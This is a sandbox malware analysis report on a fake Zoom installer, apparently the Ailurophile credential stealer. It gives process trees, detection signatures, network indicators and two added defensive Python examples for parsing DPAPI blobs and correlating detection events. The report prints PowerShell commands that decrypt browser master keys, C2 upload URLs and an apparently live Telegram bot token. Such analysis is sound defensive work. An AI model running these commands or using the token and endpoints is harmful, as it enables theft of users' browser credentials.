Windows Analysis Report
ZoomInstaller.exe

Overview

General Information

Sample name: ZoomInstaller.exe
Analysis ID: 1544493
MD5: 806a6ccce380785faa45512ce603c580
SHA1: 78a2936e19f0474f80f73144564e9f24c4559859
SHA256: c831aebefaf218907d8164288a8249755c47f68b5a6dd223dcef2d150d8df396
Tags: exe, user-NDA0E

Detection

Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Suricata IDS alerts for network traffic
AI detected suspicious sample
Detected generic credential text file
Installs new ROOT certificates
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Uses the Telegram API (likely for C&C communication)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Stores large binary data to the registry
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • ZoomInstaller.exe (PID: 5368 cmdline: "C:\Users\user\Desktop\ZoomInstaller.exe" MD5: 806A6CCCE380785FAA45512CE603C580)
    • WMIC.exe (PID: 800 cmdline: wmic path win32_videocontroller get caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 4176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • tasklist.exe (PID: 5584 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • conhost.exe (PID: 7160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 5932 cmdline: wmic os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 4232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 2328 cmdline: wmic os get Version MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 5700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5696 cmdline: powershell -Command "(Get-Item 'C:\Program Files\Google\Chrome\Application\chrome.exe').VersionInfo.FileVersion" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5204 cmdline: powershell -Command "(Get-Item 'C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe').VersionInfo.FileVersion" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • tasklist.exe (PID: 6236 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • conhost.exe (PID: 5776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1524 cmdline: powershell -Command " Add-Type -AssemblyName \"System.Security\"; $decryptedKey = [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,36,243,112,255,236,176,19,21,161,232,5,156,15,224,214,169,185,79,161,35,240,200,160,226,160,19,168,214,186,239,155,235,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,225,241,231,195,97,47,248,22,206,161,226,92,44,44,51,207,166,8,46,136,147,185,84,185,27,183,252,114,164,252,148,168,48,0,0,0,2,140,235,235,139,99,133,55,160,143,64,53,168,135,193,81,10,81,94,101,239,145,72,8,97,176,119,236,164,201,155,27,236,184,11,80,145,31,10,79,199,92,71,166,116,84,131,150,64,0,0,0,33,136,240,246,163,86,84,202,92,12,170,239,80,17,93,81,235,159,209,41,5,212,210,23,106,50,31,57,94,244,205,86,198,111,237,171,160,240,77,231,4,197,113,175,235,153,59,29,176,183,188,244,160,186,186,93,146,97,116,126,129,24,71,225), $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); $decryptedKeyString = [System.BitConverter]::ToString($decryptedKey) -replace '-', ''; Write-Output $decryptedKeyString" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5704 cmdline: powershell -Command " Add-Type -AssemblyName \"System.Security\"; $decryptedKey = [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,73,231,212,88,131,180,108,13,7,151,85,6,156,66,67,185,57,141,176,137,39,153,232,122,3,148,29,97,139,226,146,101,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,25,208,58,196,147,38,229,71,17,84,57,121,51,122,21,191,192,210,223,56,196,102,132,177,163,7,170,237,170,96,43,123,48,0,0,0,22,214,107,180,137,106,64,43,246,209,3,97,183,60,179,87,35,178,252,209,63,28,6,231,92,233,101,110,37,191,114,95,102,37,85,25,129,162,60,71,136,36,115,191,138,222,1,225,64,0,0,0,221,128,244,169,226,245,40,30,145,232,4,127,240,108,165,92,23,225,199,246,49,201,112,97,127,7,108,202,49,141,230,234,32,54,72,203,159,33,237,81,195,247,232,115,207,194,239,99,114,230,169,121,178,134,199,77,110,131,115,20,107,231,17,6), $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); $decryptedKeyString = [System.BitConverter]::ToString($decryptedKey) -replace '-', ''; Write-Output $decryptedKeyString" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
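The two powershell.exe children above (PIDs 1524 and 5704) hand a literal CryptProtectData blob to ProtectedData.Unprotect. That is how the stealer gets the browser's os_crypt key decrypted: DPAPI does the work on the victim's machine, in the victim's user context, so the sample never has to carry off a blob it could not open elsewhere. The parser below is an added example and is not part of the report, of Joe Sandbox, or of the sample. It walks that blob and shows what an analyst can read out of it without any key material: the description string names the application ("Google Chrome", "Microsoft Edge"), the master key GUID says which of the user's master key files an offline decrypt would need, and the 48-byte ciphertext is what AES-256-CBC over a 32-byte key plus one padding block looks like, consistent with Chrome's os_crypt key length. The byte arrays are copied from the report's command lines; the field layout is the publicly documented DPAPI blob structure (the same order impacket's DPAPI_BLOB uses); EDGE_CMDLINE is a constructed command line wrapped around the report's PID 5704 bytes to show extraction from raw process telemetry.

```python
"""Parse the DPAPI (CryptProtectData) blobs that the sample feeds to
ProtectedData.Unprotect. Added example; not part of the report or the sample."""
import re
import struct
import uuid

# ALG_ID values from wincrypt.h.
ALG_NAMES = {0x6610: "CALG_AES_256", 0x660E: "CALG_AES_128", 0x6603: "CALG_3DES",
             0x800E: "CALG_SHA_512", 0x800C: "CALG_SHA_256", 0x8004: "CALG_SHA1"}

# Byte array copied from the powershell.exe (PID 1524) command line in the report.
CHROME_BLOB = bytes([
    1,0,0,0, 208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235, 1,0,0,0,
    82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24, 16,0,0,0,
    28,0,0,0, 71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,
    16,102,0,0, 0,1,0,0, 32,0,0,0, 36,243,112,255,236,176,19,21,161,232,5,156,15,224,214,169,
    185,79,161,35,240,200,160,226,160,19,168,214,186,239,155,235, 0,0,0,0, 14,128,0,0, 0,2,0,0,
    32,0,0,0, 225,241,231,195,97,47,248,22,206,161,226,92,44,44,51,207,166,8,46,136,147,185,84,185,
    27,183,252,114,164,252,148,168, 48,0,0,0, 2,140,235,235,139,99,133,55,160,143,64,53,168,135,193,81,
    10,81,94,101,239,145,72,8,97,176,119,236,164,201,155,27,236,184,11,80,145,31,10,79,199,92,71,166,
    116,84,131,150, 64,0,0,0, 33,136,240,246,163,86,84,202,92,12,170,239,80,17,93,81,235,159,209,41,
    5,212,210,23,106,50,31,57,94,244,205,86,198,111,237,171,160,240,77,231,4,197,113,175,235,153,59,29,
    176,183,188,244,160,186,186,93,146,97,116,126,129,24,71,225])

# Byte array copied from the powershell.exe (PID 5704) command line in the report.
EDGE_BLOB = bytes([
    1,0,0,0, 208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235, 1,0,0,0,
    82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24, 16,0,0,0,
    30,0,0,0, 77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,
    16,102,0,0, 0,1,0,0, 32,0,0,0, 73,231,212,88,131,180,108,13,7,151,85,6,156,66,67,185,
    57,141,176,137,39,153,232,122,3,148,29,97,139,226,146,101, 0,0,0,0, 14,128,0,0, 0,2,0,0,
    32,0,0,0, 25,208,58,196,147,38,229,71,17,84,57,121,51,122,21,191,192,210,223,56,196,102,132,177,
    163,7,170,237,170,96,43,123, 48,0,0,0, 22,214,107,180,137,106,64,43,246,209,3,97,183,60,179,87,
    35,178,252,209,63,28,6,231,92,233,101,110,37,191,114,95,102,37,85,25,129,162,60,71,136,36,115,191,
    138,222,1,225, 64,0,0,0, 221,128,244,169,226,245,40,30,145,232,4,127,240,108,165,92,23,225,199,246,
    49,201,112,97,127,7,108,202,49,141,230,234,32,54,72,203,159,33,237,81,195,247,232,115,207,194,239,99,
    114,230,169,121,178,134,199,77,110,131,115,20,107,231,17,6])


def parse_dpapi_blob(buf: bytes) -> dict:
    """Walk a CryptProtectData blob (documented field order, as in impacket's
    DPAPI_BLOB) and return its fields. Raises ValueError if lengths do not add up."""
    off = 0

    def u32() -> int:
        nonlocal off
        value = struct.unpack_from("<I", buf, off)[0]
        off += 4
        return value

    def raw(n: int) -> bytes:
        nonlocal off
        chunk = buf[off:off + n]
        if len(chunk) != n:
            raise ValueError("truncated blob")
        off += n
        return chunk

    f = {}
    f["version"] = u32()
    f["provider_guid"] = str(uuid.UUID(bytes_le=raw(16)))
    f["master_key_version"] = u32()
    f["master_key_guid"] = str(uuid.UUID(bytes_le=raw(16)))  # which master key file is needed
    f["flags"] = u32()
    f["description"] = raw(u32()).decode("utf-16-le").rstrip("\x00")  # label set by the app
    alg = u32()
    f["crypt_alg"] = ALG_NAMES.get(alg, hex(alg))
    f["crypt_key_bits"] = u32()
    f["salt"] = raw(u32())
    f["strong"] = raw(u32())          # optional extra entropy, empty for these blobs
    alg = u32()
    f["hash_alg"] = ALG_NAMES.get(alg, hex(alg))
    f["hash_bits"] = u32()
    f["hmac_salt"] = raw(u32())
    f["ciphertext"] = raw(u32())      # 48 bytes = 32-byte key + one block of padding
    f["signature"] = raw(u32())
    if off != len(buf):
        raise ValueError(f"{len(buf) - off} trailing bytes")
    return f


BYTE_ARRAY_RX = re.compile(r"\[byte\[\]\]@\(([\d,\s]+)\)")


def blobs_from_cmdline(cmdline: str) -> list:
    """Parse every [byte[]]@(...) literal found in a PowerShell command line."""
    return [parse_dpapi_blob(bytes(int(b) for b in m.group(1).split(",")))
            for m in BYTE_ARRAY_RX.finditer(cmdline)]


# Constructed command line wrapping the PID 5704 byte array from the report.
EDGE_CMDLINE = ('powershell -Command " Add-Type -AssemblyName \\"System.Security\\"; $decryptedKey = '
                '[System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@('
                + ",".join(map(str, EDGE_BLOB)) +
                '), $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser)"')


def describe(blob: dict) -> str:
    return (f'{blob["description"]!r}: {blob["crypt_alg"]}/{blob["crypt_key_bits"]}-bit, '
            f'{blob["hash_alg"]}, master key {blob["master_key_guid"]}, '
            f'{len(blob["ciphertext"])}-byte ciphertext')


if __name__ == "__main__":
    print(describe(parse_dpapi_blob(CHROME_BLOB)))
    for blob in blobs_from_cmdline(EDGE_CMDLINE):
        print(describe(blob))
```

Both blobs carry the same master key GUID, as expected for two keys protected under the same user account; the provider GUID is the well-known DPAPI provider {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}. Running the parser against the command line is also a cheap triage step in a SOC: the description field tells you which application's secrets were targeted before any decrypted output is recovered.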
No configs have been found
    Source: Process Memory Space: ZoomInstaller.exe PID: 5368 | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
    Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powershell -Command "(Get-Item 'C:\Program Files\Google\Chrome\Application\chrome.exe').VersionInfo.FileVersion", CommandLine: powershell -Command "(Get-Item 'C:\Program Files\Google\Chrome\Application\chrome.exe').VersionInfo.FileVersion", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ZoomInstaller.exe", ParentImage: C:\Users\user\Desktop\ZoomInstaller.exe, ParentProcessId: 5368, ParentProcessName: ZoomInstaller.exe, ProcessCommandLine: powershell -Command "(Get-Item 'C:\Program Files\Google\Chrome\Application\chrome.exe').VersionInfo.FileVersion", ProcessId: 5696, ProcessName: powershell.exe

    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
    2024-10-29T14:10:18.734692+0100 | 2057104 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 49970 | 188.114.97.3 | 443 | TCP

    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
    2024-10-29T14:10:15.996082+0100 | 2057103 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 54299 | 1.1.1.1 | 53 | UDP
    2024-10-29T14:10:16.997721+0100 | 2057103 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 54299 | 1.1.1.1 | 53 | UDP
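The Sigma match above fires on a single event. The chain the sandbox recorded is more distinctive than any one link: one parent runs wmic os get Caption and Version, wmic path win32_videocontroller, tasklist, a PowerShell probe of the installed Chrome and Edge versions, and then the DPAPI Unprotect call with a byte array in the command line. The correlation below is an added example, not part of the report and not a Joe Sandbox or Sigma rule. Its events are constructed from the process tree above (PIDs and command lines as listed there, the DPAPI byte array shortened) plus a constructed benign cmd.exe/wmic pair as noise, in Sysmon Event ID 1 field order. A ProtectedData.Unprotect call with an inline [byte[]] literal is treated as an alert on its own, because browsers decrypt their own os_crypt key in-process and never by spawning powershell.exe; the recon links only alert when several of them share a parent.

```python
"""Correlate the recon + DPAPI-unprotect chain across process-creation events.
Added example; not part of the report. Events are constructed from the report's
process tree (field order: ProcessId, ParentProcessId, Image, CommandLine)."""
import re
from collections import defaultdict

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WMIC = r"C:\Windows\System32\wbem\WMIC.exe"

EVENTS = [
    (5368, 0, r"C:\Users\user\Desktop\ZoomInstaller.exe", r'"C:\Users\user\Desktop\ZoomInstaller.exe"'),
    (800, 5368, WMIC, "wmic path win32_videocontroller get caption"),
    (5584, 5368, r"C:\Windows\System32\tasklist.exe", "tasklist"),
    (5932, 5368, WMIC, "wmic os get Caption"),
    (2328, 5368, WMIC, "wmic os get Version"),
    (5696, 5368, PS, "powershell -Command \"(Get-Item 'C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe').VersionInfo.FileVersion\""),
    (5204, 5368, PS, "powershell -Command \"(Get-Item 'C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe').VersionInfo.FileVersion\""),
    # DPAPI byte array shortened to its first eight bytes for readability.
    (1524, 5368, PS, 'powershell -Command " Add-Type -AssemblyName \\"System.Security\\"; $decryptedKey = '
                     '[System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223), '
                     '$null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser)"'),
    # Constructed benign noise: an administrator's cmd.exe running the same wmic query.
    (7000, 1, r"C:\Windows\System32\cmd.exe", "cmd.exe"),
    (7001, 7000, WMIC, "wmic os get Version"),
]

# One indicator per link of the chain the sandbox observed.
INDICATORS = {
    "dpapi_unprotect_from_cmdline": re.compile(r"ProtectedData\]::Unprotect\(\[byte\[\]\]@\(", re.I),
    "browser_version_probe": re.compile(r"(chrome|msedge)\.exe'\)\.VersionInfo\.FileVersion", re.I),
    "os_recon_wmic": re.compile(r"^wmic\s+os\s+get\s+(caption|version)", re.I),
    "gpu_recon_wmic": re.compile(r"^wmic\s+path\s+win32_videocontroller", re.I),
    "process_listing": re.compile(r"^tasklist\b", re.I),
}

HIGH_CONFIDENCE = {"dpapi_unprotect_from_cmdline"}


def match_event(cmdline: str) -> set:
    """Names of the indicators a single command line triggers."""
    return {name for name, rx in INDICATORS.items() if rx.search(cmdline)}


def correlate(events, min_links: int = 3) -> dict:
    """Group child command lines by parent PID. A parent is flagged when any of its
    children hits a high-confidence indicator, or when at least `min_links` distinct
    links of the chain appear under it. Returns {ppid: (parent image, sorted links)}."""
    images = {pid: image for pid, _, image, _ in events}
    by_parent = defaultdict(set)
    for _, ppid, _, cmdline in events:
        by_parent[ppid] |= match_event(cmdline)
    alerts = {}
    for ppid, links in by_parent.items():
        if links & HIGH_CONFIDENCE or len(links) >= min_links:
            alerts[ppid] = (images.get(ppid, "<unknown>"), sorted(links))
    return alerts


if __name__ == "__main__":
    for ppid, (image, links) in correlate(EVENTS).items():
        print(f"parent {ppid} ({image}): {', '.join(links)}")
```

With the default threshold only the ZoomInstaller.exe parent is flagged, carrying all five links; the lone administrative wmic call under cmd.exe is not. Lowering min_links to 1 shows the trade-off: the recon commands are individually common on managed hosts, which is why the DPAPI call is the link worth alerting on by itself.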


    AV Detection

    Source: Submitted Sample | Integrated Neural Analysis Model: Matched 96.4% probability
    Source: ZoomInstaller.exe | Joe Sandbox ML: detected
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_00007FFD347652AE CryptUnprotectData
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 20_2_00007FFD3476517D CryptUnprotectData
    Source: ZoomInstaller.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

    Networking

    Source: Network traffic | Suricata IDS: 2057103 - Severity 1 - ET MALWARE Win32/Ailurophile Stealer CnC Domain in DNS Lookup (manestvli .shop) : 192.168.2.6:54299 -> 1.1.1.1:53
    Source: Network traffic | Suricata IDS: 2057104 - Severity 1 - ET MALWARE Observed Win32/Ailurophile Stealer Domain (manestvli .shop) in TLS SNI : 192.168.2.6:49970 -> 188.114.97.3:443
    Source: unknown | DNS query: name: api.telegram.org
    Source: Joe Sandbox View | IP Address: 149.154.167.220
    Source: Joe Sandbox View | IP Address: 104.26.9.59
    Source: Joe Sandbox View | IP Address: 188.114.97.3
    Source: Joe Sandbox View | ASN Name: TELEGRAMRU
    Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: api.myip.com | User-Agent: Go-http-client/1.1 | Accept-Encoding: gzip
    Source: global traffic | DNS traffic detected: DNS query: api.myip.com
    Source: global traffic | DNS traffic detected: DNS query: manestvli.shop
    Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
    Source: unknown | HTTP traffic detected: POST /upload.php?data=<removed>&hash=2d6441c1bfc749b0344f HTTP/1.1 | Host: manestvli.shop | User-Agent: Go-http-client/1.1 | Content-Length: 3788 | Content-Type: multipart/form-data; boundary=2936f3dac7c8181cd97977433163a9cd10ed18c947a33702af6c7d74091c | Accept-Encoding: gzip
    Source: powershell.exe, 00000011.00000002.2563414828.00000160AE9C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2548489987.00000160A0157000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2563414828.00000160AE880000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2682435219.0000022F34AF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2725292106.0000022F43272000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2725292106.0000022F4312F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000014.00000002.2682435219.0000022F332F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000011.00000002.2548489987.000001609E811000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2682435219.0000022F330C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000011.00000002.2548489987.000001609FF14000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2682435219.0000022F347BF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
    Source: powershell.exe, 00000014.00000002.2682435219.0000022F332F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: ZoomInstaller.exe, 00000000.00000002.2806871390.000000C000428000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.2803793282.000000C0003A6000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.dr | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
    Source: ZoomInstaller.exe, 00000000.00000002.2803793282.000000C00026A000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.2803793282.000000C000068000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.2803793282.000000C0001A4000.00000004.00001000.00020000.00000000.sdmp, info.txt.0.dr | String found in binary or memory: https://ailurophilestealer.com
    Source: ZoomInstaller.exe, 00000000.00000002.2803793282.000000C000212000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://ailurophilestealer.com/bot
    Source: powershell.exe, 00000011.00000002.2548489987.000001609E811000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2682435219.0000022F330C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
    Source: ZoomInstaller.exe, 00000000.00000002.2803793282.000000C000102000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://api.myip.com
    Source: ZoomInstaller.exe, 00000000.00000002.2803793282.000000C000102000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://api.myip.comhttps://api.myip.comHTTP_PROXYhttp_proxyHTTPS_PROXYhttps_proxyNO_PROXYno_proxyGe
    Source: ZoomInstaller.exe, 00000000.00000002.2803793282.000000C00000E000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot%s/sendMessage
    Source: ZoomInstaller.exe, 00000000.00000002.2803793282.000000C00000E000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot%s/sendMessagehttps://api.telegram.org/bot%s/sendMessagechat_id=68432125
    Source: ZoomInstaller.exe, 00000000.00000002.2806871390.000000C000410000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7576282251:AAG0mg-rIFL8SDgfm15Nk4l51UZeLB-cEwU/sendMessageCookies
    Source: ZoomInstaller.exe, 00000000.00000002.2806871390.000000C000428000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.2803793282.000000C0003A6000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.dr | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
    Source: ZoomInstaller.exe, 00000000.00000002.2806871390.000000C000428000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.2803793282.000000C0003A6000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.dr | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
    Source: ZoomInstaller.exe, 00000000.00000002.2806871390.000000C000428000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.2803793282.000000C0003A6000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.dr | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
    Source: powershell.exe, 00000014.00000002.2725292106.0000022F4312F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000014.00000002.2725292106.0000022F4312F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000014.00000002.2725292106.0000022F4312F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
    Source: ZoomInstaller.exe, 00000000.00000002.2806871390.000000C000428000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.2803793282.000000C0003A6000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.dr | String found in binary or memory: https://duckduckgo.com/ac/?q=
    Source: ZoomInstaller.exe, 00000000.00000002.2806871390.000000C000428000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.2803793282.000000C0003A6000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.dr | String found in binary or memory: https://duckduckgo.com/chrome_newtab
    Source: ZoomInstaller.exe, 00000000.00000002.2806871390.000000C000428000.00000004.00001000.00020000.00000000.sdmp, ZoomInstaller.exe, 00000000.00000002.2803793282.000000C0003A6000.00000004.00001000.00020000.00000000.sdmp, webdata.db0.0.dr, Web.db.0.dr | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
    Source: powershell.exe, 00000014.00000002.2682435219.0000022F332F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 00000011.00000002.2548489987.000001609FA7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2682435219.0000022F3427B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
    Source: ZoomInstaller.exe, 00000000.00000002.2803793282.000000C0001CA000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://manestvli.shop/upload.php?
    Source: ZoomInstaller.exe, 00000000.00000002.2803793282.000000C000078000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://manestvli.shop/upload.php?data=bDkyQVpaZGp1YXE2bU0raWZhUFJtWUNJaGQxN3phMmRsWGljcThhdG1KK1drT
    Source: ZoomInstaller.exe, 00000000.00000002.2803793282.000000C0001CA000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://manestvli.shop/upload.php?https://manestvli.shop/upload.php?
    Source: powershell.exe, 00000011.00000002.2563414828.00000160AE9C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2548489987.00000160A0157000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2563414828.00000160AE880000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2682435219.0000022F34AF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2725292106.0000022F43272000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2725292106.0000022F4312F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
    Source: powershell.exe, 00000011.00000002.2548489987.000001609FF14000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2682435219.0000022F347BF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.org
